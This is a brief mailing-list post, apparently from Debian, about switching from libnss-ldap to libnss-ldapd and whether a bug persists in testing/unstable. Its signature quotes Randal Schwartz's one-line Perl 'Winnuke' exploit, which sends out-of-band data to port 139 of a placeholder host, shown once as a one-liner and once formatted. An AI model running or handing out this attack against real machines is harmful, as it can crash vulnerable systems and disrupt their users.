I've moved from libnss-ldap to libnss-ldapd, and am trying to clean things up for a hopeful hand-off of the package...
Does this problem still exist in testing/unstable ? -- Rick Nelson Winnuke in one line? No problem: perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"bad.dude.com:139")->send("bye",MSG_OOB)' And formatted so it's a little easier to read: #!/usr/bin/perl use IO::Socket; IO::Socket::INET ->new(PeerAddr=>"bad.dude.com:139") ->send("bye", MSG_OOB); -- Randal Schwartz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]